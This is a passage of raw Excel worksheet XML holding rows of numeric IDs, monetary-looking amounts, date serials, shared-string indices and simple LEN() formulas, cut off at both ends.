      <c r="A1182">
        <v>5468</v>
      </c>
      <c r="B1182" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="1183" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1183">
        <v>5469</v>
      </c>
      <c r="B1183" s="8">
        <v>6500</v>
      </c>
    </row>
    <row r="1184" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1184">
        <v>5473</v>
      </c>
      <c r="B1184" s="8">
        <v>40000</v>
      </c>
    </row>
    <row r="1185" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1185">
        <v>5474</v>
      </c>
      <c r="B1185" s="8">
        <v>310000</v>
      </c>
    </row>
    <row r="1186" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1186">
        <v>5475</v>
      </c>
      <c r="B1186" s="8">
        <v>1600000</v>
      </c>
    </row>
    <row r="1187" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1187">
        <v>5476</v>
      </c>
      <c r="B1187" s="8">
        <v>380000</v>
      </c>
    </row>
    <row r="1188" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1188">
        <v>5477</v>
      </c>
      <c r="B1188" s="8">
        <v>1250000</v>
      </c>
    </row>
    <row r="1189" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1189">
        <v>5479</v>
      </c>
      <c r="B1189" s="8">
        <v>870000</v>
      </c>
    </row>
    <row r="1190" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1190">
        <v>5480</v>
      </c>
      <c r="B1190" s="8">
        <v>4902500</v>
      </c>
    </row>
    <row r="1191" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1191">
        <v>5481</v>
      </c>
      <c r="B1191" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="1192" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1192">
        <v>5483</v>
      </c>
      <c r="B1192" s="8">
        <v>44000</v>
      </c>
    </row>
    <row r="1193" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1193">
        <v>5485</v>
      </c>
      <c r="B1193" s="8">
        <v>23000</v>
      </c>
    </row>
    <row r="1194" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1194">
        <v>5491</v>
      </c>
      <c r="B1194" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="1195" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1195">
        <v>5492</v>
      </c>
      <c r="B1195" s="8">
        <v>1030000</v>
      </c>
    </row>
    <row r="1196" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1196">
        <v>5495</v>
      </c>
      <c r="B1196" s="8">
        <v>4800</v>
      </c>
    </row>
    <row r="1197" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1197">
        <v>5504</v>
      </c>
      <c r="B1197" s="8">
        <v>450000</v>
      </c>
    </row>
    <row r="1198" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1198">
        <v>5505</v>
      </c>
      <c r="B1198" s="8">
        <v>900000</v>
      </c>
    </row>
    <row r="1199" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1199">
        <v>5507</v>
      </c>
      <c r="B1199" s="8">
        <v>500000</v>
      </c>
    </row>
    <row r="1200" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1200">
        <v>5509</v>
      </c>
      <c r="B1200" s="8">
        <v>4400</v>
      </c>
    </row>
    <row r="1201" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1201">
        <v>5510</v>
      </c>
      <c r="B1201" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="1202" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1202">
        <v>5522</v>
      </c>
      <c r="B1202" s="8">
        <v>81600</v>
      </c>
    </row>
    <row r="1203" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1203">
        <v>5523</v>
      </c>
      <c r="B1203" s="8">
        <v>450000</v>
      </c>
    </row>
    <row r="1204" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1204">
        <v>5527</v>
      </c>
      <c r="B1204" s="8">
        <v>600</v>
      </c>
    </row>
    <row r="1205" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1205">
        <v>5535</v>
      </c>
      <c r="B1205" s="8">
        <v>350000</v>
      </c>
    </row>
    <row r="1206" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1206">
        <v>5540</v>
      </c>
      <c r="B1206" s="8">
        <v>1500000</v>
      </c>
    </row>
    <row r="1207" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1207">
        <v>5541</v>
      </c>
      <c r="B1207" s="8">
        <v>8400</v>
      </c>
    </row>
    <row r="1208" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1208">
        <v>5543</v>
      </c>
      <c r="B1208" s="8">
        <v>42100</v>
      </c>
    </row>
    <row r="1209" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1209">
        <v>5549</v>
      </c>
      <c r="B1209" s="8">
        <v>6000000</v>
      </c>
    </row>
    <row r="1210" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1210">
        <v>5554</v>
      </c>
      <c r="B1210" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="1211" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1211">
        <v>5561</v>
      </c>
      <c r="B1211" s="8">
        <v>160000</v>
      </c>
    </row>
    <row r="1212" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1212">
        <v>5568</v>
      </c>
      <c r="B1212" s="8">
        <v>465</v>
      </c>
    </row>
    <row r="1213" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1213">
        <v>5570</v>
      </c>
      <c r="B1213" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="1214" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1214">
        <v>5582</v>
      </c>
      <c r="B1214" s="8">
        <v>604050</v>
      </c>
    </row>
    <row r="1215" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1215">
        <v>5594</v>
      </c>
      <c r="B1215" s="8">
        <v>6164000</v>
      </c>
    </row>
    <row r="1216" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1216">
        <v>5604</v>
      </c>
      <c r="B1216" s="8">
        <v>1221568608</v>
      </c>
    </row>
    <row r="1217" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1217">
        <v>5611</v>
      </c>
      <c r="B1217" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="1218" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1218">
        <v>5613</v>
      </c>
      <c r="B1218" s="8">
        <v>30000</v>
      </c>
    </row>
    <row r="1219" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1219">
        <v>5615</v>
      </c>
      <c r="B1219" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1220" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1220">
        <v>5617</v>
      </c>
      <c r="B1220" s="8">
        <v>1500</v>
      </c>
    </row>
    <row r="1221" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1221">
        <v>5620</v>
      </c>
      <c r="B1221" s="8"/>
    </row>
    <row r="1222" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1222">
        <v>5622</v>
      </c>
      <c r="B1222" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="1223" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1223">
        <v>5623</v>
      </c>
      <c r="B1223" s="8">
        <v>7200</v>
      </c>
    </row>
    <row r="1224" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1224">
        <v>5625</v>
      </c>
      <c r="B1224" s="8">
        <v>600</v>
      </c>
    </row>
    <row r="1225" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1225">
        <v>5626</v>
      </c>
      <c r="B1225" s="8">
        <v>240000</v>
      </c>
    </row>
    <row r="1226" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1226">
        <v>5627</v>
      </c>
      <c r="B1226" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="1227" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1227">
        <v>5628</v>
      </c>
      <c r="B1227" s="8">
        <v>70000</v>
      </c>
    </row>
    <row r="1228" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1228">
        <v>5631</v>
      </c>
      <c r="B1228" s="8">
        <v>898000</v>
      </c>
    </row>
    <row r="1229" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1229">
        <v>5637</v>
      </c>
      <c r="B1229" s="8">
        <v>6000000</v>
      </c>
    </row>
    <row r="1230" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1230">
        <v>5639</v>
      </c>
      <c r="B1230" s="8">
        <v>55</v>
      </c>
    </row>
    <row r="1231" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1231">
        <v>5640</v>
      </c>
      <c r="B1231" s="8">
        <v>3010</v>
      </c>
    </row>
    <row r="1232" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1232">
        <v>5642</v>
      </c>
      <c r="B1232" s="8">
        <v>80000</v>
      </c>
    </row>
    <row r="1233" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1233">
        <v>5643</v>
      </c>
      <c r="B1233" s="8">
        <v>975154</v>
      </c>
    </row>
    <row r="1234" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1234">
        <v>5644</v>
      </c>
      <c r="B1234" s="8">
        <v>1050</v>
      </c>
    </row>
    <row r="1235" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1235">
        <v>5645</v>
      </c>
      <c r="B1235" s="8">
        <v>11000</v>
      </c>
    </row>
    <row r="1236" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1236">
        <v>5649</v>
      </c>
      <c r="B1236" s="8">
        <v>48000</v>
      </c>
    </row>
    <row r="1237" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1237">
        <v>5650</v>
      </c>
      <c r="B1237" s="8">
        <v>780000</v>
      </c>
    </row>
    <row r="1238" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1238">
        <v>5651</v>
      </c>
      <c r="B1238" s="8">
        <v>360000</v>
      </c>
    </row>
    <row r="1239" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1239">
        <v>5665</v>
      </c>
      <c r="B1239" s="8">
        <v>180000</v>
      </c>
    </row>
    <row r="1240" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1240">
        <v>5667</v>
      </c>
      <c r="B1240" s="8">
        <v>364000</v>
      </c>
    </row>
    <row r="1241" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1241">
        <v>5669</v>
      </c>
      <c r="B1241" s="8">
        <v>150000</v>
      </c>
    </row>
    <row r="1242" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1242">
        <v>5671</v>
      </c>
      <c r="B1242" s="8">
        <v>189000</v>
      </c>
    </row>
    <row r="1243" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1243">
        <v>5672</v>
      </c>
      <c r="B1243" s="8">
        <v>700000</v>
      </c>
    </row>
    <row r="1244" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1244">
        <v>5673</v>
      </c>
      <c r="B1244" s="8">
        <v>5000</v>
      </c>
    </row>
    <row r="1245" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1245">
        <v>5674</v>
      </c>
      <c r="B1245" s="8">
        <v>3720</v>
      </c>
    </row>
    <row r="1246" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1246">
        <v>5676</v>
      </c>
      <c r="B1246" s="8">
        <v>200</v>
      </c>
    </row>
    <row r="1247" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1247">
        <v>5678</v>
      </c>
      <c r="B1247" s="8">
        <v>197</v>
      </c>
    </row>
    <row r="1248" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1248">
        <v>5679</v>
      </c>
      <c r="B1248" s="8">
        <v>300</v>
      </c>
    </row>
    <row r="1249" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1249">
        <v>5681</v>
      </c>
      <c r="B1249" s="8">
        <v>20000</v>
      </c>
    </row>
    <row r="1250" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1250">
        <v>5684</v>
      </c>
      <c r="B1250" s="8">
        <v>10000</v>
      </c>
    </row>
    <row r="1251" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1251">
        <v>5686</v>
      </c>
      <c r="B1251" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1252" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1252">
        <v>5687</v>
      </c>
      <c r="B1252" s="8">
        <v>120000</v>
      </c>
    </row>
    <row r="1253" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1253">
        <v>5693</v>
      </c>
      <c r="B1253" s="8">
        <v>1000000</v>
      </c>
    </row>
    <row r="1254" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1254">
        <v>5694</v>
      </c>
      <c r="B1254" s="8">
        <v>2400</v>
      </c>
    </row>
    <row r="1255" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1255">
        <v>5695</v>
      </c>
      <c r="B1255" s="8">
        <v>60000</v>
      </c>
    </row>
    <row r="1256" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1256">
        <v>5699</v>
      </c>
      <c r="B1256" s="8">
        <v>77000</v>
      </c>
    </row>
    <row r="1257" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1257">
        <v>5700</v>
      </c>
      <c r="B1257" s="8">
        <v>4200181</v>
      </c>
    </row>
    <row r="1258" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1258">
        <v>5714</v>
      </c>
      <c r="B1258" s="8">
        <v>35000</v>
      </c>
    </row>
    <row r="1259" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1259">
        <v>5715</v>
      </c>
      <c r="B1259" s="8">
        <v>7200</v>
      </c>
    </row>
    <row r="1260" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1260">
        <v>5734</v>
      </c>
      <c r="B1260" s="8">
        <v>8000</v>
      </c>
    </row>
    <row r="1261" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1261">
        <v>5754</v>
      </c>
      <c r="B1261" s="8">
        <v>7000</v>
      </c>
    </row>
    <row r="1262" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1262">
        <v>5755</v>
      </c>
      <c r="B1262" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1263" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1263">
        <v>5766</v>
      </c>
      <c r="B1263" s="8">
        <v>185000</v>
      </c>
    </row>
    <row r="1264" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1264">
        <v>5768</v>
      </c>
      <c r="B1264" s="8">
        <v>400000</v>
      </c>
    </row>
    <row r="1265" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1265">
        <v>5772</v>
      </c>
      <c r="B1265" s="8">
        <v>90000</v>
      </c>
    </row>
    <row r="1266" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1266">
        <v>5774</v>
      </c>
      <c r="B1266" s="8">
        <v>2400000</v>
      </c>
    </row>
    <row r="1267" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1267">
        <v>5790</v>
      </c>
      <c r="B1267" s="8">
        <v>100000</v>
      </c>
    </row>
    <row r="1268" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1268">
        <v>5799</v>
      </c>
      <c r="B1268" s="8">
        <v>1250000</v>
      </c>
    </row>
    <row r="1269" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1269">
        <v>5800</v>
      </c>
      <c r="B1269" s="8">
        <v>411000</v>
      </c>
    </row>
    <row r="1270" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1270">
        <v>5818</v>
      </c>
      <c r="B1270" s="8">
        <v>2000</v>
      </c>
    </row>
    <row r="1271" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1271">
        <v>5819</v>
      </c>
      <c r="B1271" s="8">
        <v>4200</v>
      </c>
    </row>
    <row r="1272" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1272">
        <v>5928</v>
      </c>
      <c r="B1272" s="8">
        <v>300000</v>
      </c>
    </row>
    <row r="1273" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A1273">
        <v>5929</v>
      </c>
      <c r="B1273" s="8">
        <v>455000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838AE-B3EA-5C4B-B089-EAFBF94E2474}">
  <dimension ref="A1:L5081"/>
  <sheetViews>
    <sheetView topLeftCell="D5012" workbookViewId="0">
      <selection activeCell="B28" sqref="B28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.5" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="6.1640625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="65.83203125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="80.6640625" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="10.5" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="80.6640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="8.83203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="12.6640625" bestFit="1" customWidth="1"/>
    <col min="9" max="10" width="80.6640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>7</v>
      </c>
      <c r="B1" t="s">
        <v>0</v>
      </c>
      <c r="C1" t="s">
        <v>1</v>
      </c>
      <c r="D1" t="s">
        <v>9416</v>
      </c>
      <c r="E1" t="s">
        <v>9417</v>
      </c>
      <c r="F1" t="s">
        <v>9418</v>
      </c>
      <c r="G1" t="s">
        <v>6</v>
      </c>
      <c r="H1" t="s">
        <v>9419</v>
      </c>
      <c r="I1" t="s">
        <v>9420</v>
      </c>
      <c r="J1" t="s">
        <v>9421</v>
      </c>
      <c r="K1" t="s">
        <v>16233</v>
      </c>
      <c r="L1" t="s">
        <v>16234</v>
      </c>
    </row>
    <row r="2" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A2">
        <v>20145</v>
      </c>
      <c r="B2">
        <v>2671</v>
      </c>
      <c r="C2" t="s">
        <v>5661</v>
      </c>
      <c r="D2" t="s">
        <v>10503</v>
      </c>
      <c r="E2">
        <v>11</v>
      </c>
      <c r="F2" t="s">
        <v>9559</v>
      </c>
      <c r="G2" s="1">
        <v>44105</v>
      </c>
      <c r="H2">
        <v>10000</v>
      </c>
      <c r="I2" t="s">
        <v>10504</v>
      </c>
      <c r="J2" t="s">
        <v>10505</v>
      </c>
      <c r="K2">
        <f>LEN(I2)</f>
        <v>500</v>
      </c>
      <c r="L2">
        <f>LEN(J2)</f>
        <v>482</v>
      </c>
    </row>
    <row r="3" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A3">
        <v>20148</v>
      </c>
      <c r="B3">
        <v>2671</v>
      </c>
      <c r="C3" t="s">
        <v>5661</v>
      </c>
      <c r="D3" t="s">
        <v>10503</v>
      </c>
      <c r="E3">
        <v>11</v>
      </c>
      <c r="F3" t="s">
        <v>512</v>
      </c>
      <c r="G3" s="1">
        <v>44105</v>
      </c>
      <c r="H3">
        <v>10000</v>
      </c>
      <c r="I3" t="s">
        <v>10504</v>
      </c>
      <c r="J3" t="s">
        <v>10505</v>
      </c>
      <c r="K3">
        <f>LEN(I3)</f>
        <v>500</v>
      </c>
      <c r="L3">
        <f>LEN(J3)</f>
        <v>482</v>
      </c>
    </row>
    <row r="4" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A4">
        <v>20149</v>
      </c>
      <c r="B4">
        <v>2671</v>
      </c>
      <c r="C4" t="s">
        <v>5661</v>
      </c>
      <c r="D4" t="s">
        <v>10503</v>
      </c>
      <c r="E4">
        <v>11</v>
      </c>
      <c r="F4" t="s">
        <v>9454</v>
      </c>
      <c r="G4" s="1">
        <v>44105</v>
      </c>
      <c r="H4">
        <v>10000</v>
      </c>
      <c r="I4" t="s">
        <v>10504</v>
      </c>
      <c r="J4" t="s">
        <v>10505</v>
      </c>
      <c r="K4">
        <f>LEN(I4)</f>
        <v>500</v>
      </c>
      <c r="L4">
        <f>LEN(J4)</f>
        <v>482</v>
      </c>
    </row>
    <row r="5" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A5">
        <v>20150</v>
      </c>
      <c r="B5">
        <v>2671</v>
      </c>
      <c r="C5" t="s">
        <v>5661</v>
      </c>
      <c r="D5" t="s">
        <v>10503</v>
      </c>
      <c r="E5">
        <v>11</v>
      </c>
      <c r="F5" t="s">
        <v>9466</v>
      </c>
      <c r="G5" s="1">
        <v>44105</v>
      </c>
      <c r="H5">
        <v>10000</v>
      </c>
      <c r="I5" t="s">
        <v>10504</v>
      </c>
      <c r="J5" t="s">
        <v>10505</v>
      </c>
      <c r="K5">
        <f>LEN(I5)</f>
        <v>500</v>
      </c>
      <c r="L5">
        <f>LEN(J5)</f>
        <v>482</v>
      </c>
    </row>
    <row r="6" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A6">
        <v>20162</v>
      </c>
      <c r="B6">
        <v>2671</v>
      </c>
      <c r="C6" t="s">
        <v>5661</v>
      </c>
      <c r="D6" t="s">
        <v>10503</v>
      </c>
      <c r="E6">
        <v>11</v>
      </c>
      <c r="F6" t="s">
        <v>10387</v>
      </c>
      <c r="G6" s="1">
        <v>44105</v>
      </c>
      <c r="H6">
        <v>10000</v>
      </c>
      <c r="I6" t="s">
        <v>10504</v>
      </c>
      <c r="J6" t="s">
        <v>10505</v>
      </c>
      <c r="K6">
        <f>LEN(I6)</f>
        <v>500</v>
      </c>
      <c r="L6">
        <f>LEN(J6)</f>
        <v>482</v>
      </c>
    </row>
    <row r="7" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A7">
        <v>20147</v>
      </c>
      <c r="B7">
        <v>2671</v>
      </c>
      <c r="C7" t="s">
        <v>5661</v>
      </c>
      <c r="D7" t="s">
        <v>10503</v>
      </c>
      <c r="E7">
        <v>11</v>
      </c>
      <c r="F7" t="s">
        <v>5434</v>
      </c>
      <c r="G7" s="1">
        <v>44105</v>
      </c>
      <c r="H7">
        <v>10000</v>
      </c>
      <c r="I7" t="s">
        <v>10504</v>
      </c>
      <c r="J7" t="s">
        <v>10508</v>
      </c>
      <c r="K7">
        <f>LEN(I7)</f>
        <v>500</v>
      </c>
      <c r="L7">
        <f>LEN(J7)</f>
        <v>462</v>
      </c>
    </row>
    <row r="8" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A8">
        <v>20146</v>
      </c>
      <c r="B8">
        <v>2671</v>
      </c>
      <c r="C8" t="s">
        <v>5661</v>
      </c>
      <c r="D8" t="s">
        <v>10503</v>
      </c>
      <c r="E8">
        <v>11</v>
      </c>
      <c r="F8" t="s">
        <v>9217</v>
      </c>
      <c r="G8" s="1">
        <v>44105</v>
      </c>
      <c r="H8">
        <v>10000</v>
      </c>
      <c r="I8" t="s">
        <v>10506</v>
      </c>
      <c r="J8" t="s">
        <v>10507</v>
      </c>
      <c r="K8">
        <f>LEN(I8)</f>
        <v>473</v>
      </c>
      <c r="L8">
        <f>LEN(J8)</f>
        <v>442</v>
      </c>
    </row>
    <row r="9" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A9">
        <v>19365</v>
      </c>
      <c r="B9">
        <v>766</v>
      </c>
      <c r="C9" t="s">
        <v>307</v>
      </c>
      <c r="D9" t="s">
        <v>9963</v>
      </c>
      <c r="E9">
        <v>16</v>
      </c>
      <c r="F9" t="s">
        <v>945</v>
      </c>
      <c r="G9" s="1">
        <v>43986</v>
      </c>
      <c r="H9">
        <v>3000000</v>
      </c>
      <c r="J9" t="s">
        <v>9967</v>
      </c>
      <c r="K9">
        <f>LEN(I9)</f>
        <v>0</v>
      </c>
      <c r="L9">
        <f>LEN(J9)</f>
        <v>238</v>
      </c>
    </row>
    <row r="10" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A10">
        <v>21311</v>
      </c>
      <c r="B10">
        <v>241</v>
      </c>
      <c r="C10" t="s">
        <v>1604</v>
      </c>
      <c r="D10" t="s">
        <v>11287</v>
      </c>
      <c r="E10">
        <v>16</v>
      </c>
      <c r="F10" t="s">
        <v>11288</v>
      </c>
      <c r="G10" s="1">
        <v>44061</v>
      </c>
      <c r="H10">
        <v>674806.98</v>
      </c>
      <c r="I10" t="s">
        <v>11289</v>
      </c>
      <c r="J10" t="s">
        <v>11290</v>
      </c>
      <c r="K10">
        <f>LEN(I10)</f>
        <v>176</v>
      </c>
      <c r="L10">
        <f>LEN(J10)</f>
        <v>181</v>
      </c>
    </row>
    <row r="11" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A11">
        <v>19840</v>
      </c>
      <c r="B11">
        <v>2024</v>
      </c>
      <c r="C11" t="s">
        <v>16277</v>
      </c>
      <c r="D11" t="s">
        <v>16278</v>
      </c>
      <c r="E11">
        <v>16</v>
      </c>
      <c r="F11" t="s">
        <v>7057</v>
      </c>
      <c r="G11" s="1">
        <v>43962</v>
      </c>
      <c r="H11" s="4">
        <v>150000</v>
      </c>
      <c r="I11" t="s">
        <v>10275</v>
      </c>
      <c r="J11" t="s">
        <v>10276</v>
      </c>
      <c r="K11">
        <f>LEN(I11)</f>
        <v>37</v>
      </c>
      <c r="L11">
        <f>LEN(J11)</f>
        <v>170</v>
      </c>
    </row>
    <row r="12" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A12">
        <v>20342</v>
      </c>
      <c r="B12">
        <v>2602</v>
      </c>
      <c r="C12" t="s">
        <v>5245</v>
      </c>
      <c r="D12" t="s">
        <v>10641</v>
      </c>
      <c r="E12">
        <v>11</v>
      </c>
      <c r="F12" t="s">
        <v>364</v>
      </c>
      <c r="G12" s="1">
        <v>43913</v>
      </c>
      <c r="H12">
        <v>10000</v>
      </c>
      <c r="I12" t="s">
        <v>10642</v>
      </c>
      <c r="J12" t="s">
        <v>10643</v>
      </c>
      <c r="K12">
        <f>LEN(I12)</f>
        <v>48</v>
      </c>
      <c r="L12">
        <f>LEN(J12)</f>
        <v>166</v>
      </c>
    </row>
    <row r="13" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A13">
        <v>19841</v>
      </c>
      <c r="B13">
        <v>2024</v>
      </c>
      <c r="C13" t="s">
        <v>16277</v>
      </c>
      <c r="D13" t="s">
        <v>16278</v>
      </c>
      <c r="E13">
        <v>16</v>
      </c>
      <c r="F13" t="s">
        <v>9472</v>
      </c>
      <c r="G13" s="1">
        <v>43962</v>
      </c>
      <c r="H13" s="4">
        <v>150000</v>
      </c>
      <c r="I13" t="s">
        <v>10275</v>
      </c>
      <c r="J13" t="s">
        <v>10277</v>
      </c>
      <c r="K13">
        <f>LEN(I13)</f>
        <v>37</v>
      </c>
      <c r="L13">
        <f>LEN(J13)</f>
        <v>163</v>
      </c>
    </row>
    <row r="14" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A14">
        <v>20041</v>
      </c>
      <c r="B14">
        <v>2636</v>
      </c>
      <c r="C14" t="s">
        <v>5612</v>
      </c>
      <c r="D14" t="s">
        <v>10423</v>
      </c>
      <c r="E14">
        <v>26</v>
      </c>
      <c r="F14" t="s">
        <v>7564</v>
      </c>
      <c r="G14" s="1">
        <v>43924</v>
      </c>
      <c r="H14">
        <v>2000</v>
      </c>
      <c r="I14" t="s">
        <v>10424</v>
      </c>
      <c r="J14" t="s">
        <v>10425</v>
      </c>
      <c r="K14">
        <f>LEN(I14)</f>
        <v>266</v>
      </c>
      <c r="L14">
        <f>LEN(J14)</f>
        <v>162</v>
      </c>
    </row>
    <row r="15" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A15">
        <v>20042</v>
      </c>
      <c r="B15">
        <v>2636</v>
      </c>
      <c r="C15" t="s">
        <v>5612</v>
      </c>
      <c r="D15" t="s">
        <v>10423</v>
      </c>
      <c r="E15">
        <v>26</v>
      </c>
      <c r="F15" t="s">
        <v>10426</v>
      </c>
      <c r="G15" s="1">
        <v>43924</v>
      </c>
      <c r="H15">
        <v>2500</v>
      </c>
      <c r="I15" t="s">
        <v>10427</v>
      </c>
      <c r="J15" t="s">
        <v>10425</v>
      </c>
      <c r="K15">
        <f>LEN(I15)</f>
        <v>263</v>
      </c>
      <c r="L15">
        <f>LEN(J15)</f>
        <v>162</v>
      </c>
    </row>
    <row r="16" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A16">
        <v>20817</v>
      </c>
      <c r="B16">
        <v>2675</v>
      </c>
      <c r="C16" t="s">
        <v>6012</v>
      </c>
      <c r="D16" t="s">
        <v>11002</v>
      </c>
      <c r="E16">
        <v>26</v>
      </c>
      <c r="F16" t="s">
        <v>3814</v>
      </c>
      <c r="G16" s="1">
        <v>44011</v>
      </c>
      <c r="H16">
        <v>120000</v>
      </c>
      <c r="I16" t="s">
        <v>11006</v>
      </c>
      <c r="J16" t="s">
        <v>11004</v>
      </c>
      <c r="K16">
        <f>LEN(I16)</f>
        <v>76</v>
      </c>
      <c r="L16">
        <f>LEN(J16)</f>
        <v>158</v>
      </c>
    </row>
    <row r="17" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A17">
        <v>20815</v>
      </c>
      <c r="B17">
        <v>2675</v>
      </c>
      <c r="C17" t="s">
        <v>6012</v>
      </c>
      <c r="D17" t="s">
        <v>11002</v>
      </c>
      <c r="E17">
        <v>26</v>
      </c>
      <c r="F17" t="s">
        <v>4686</v>
      </c>
      <c r="G17" s="1">
        <v>44011</v>
      </c>
      <c r="H17">
        <v>180000</v>
      </c>
      <c r="I17" t="s">
        <v>11008</v>
      </c>
      <c r="J17" t="s">
        <v>11004</v>
      </c>
      <c r="K17">
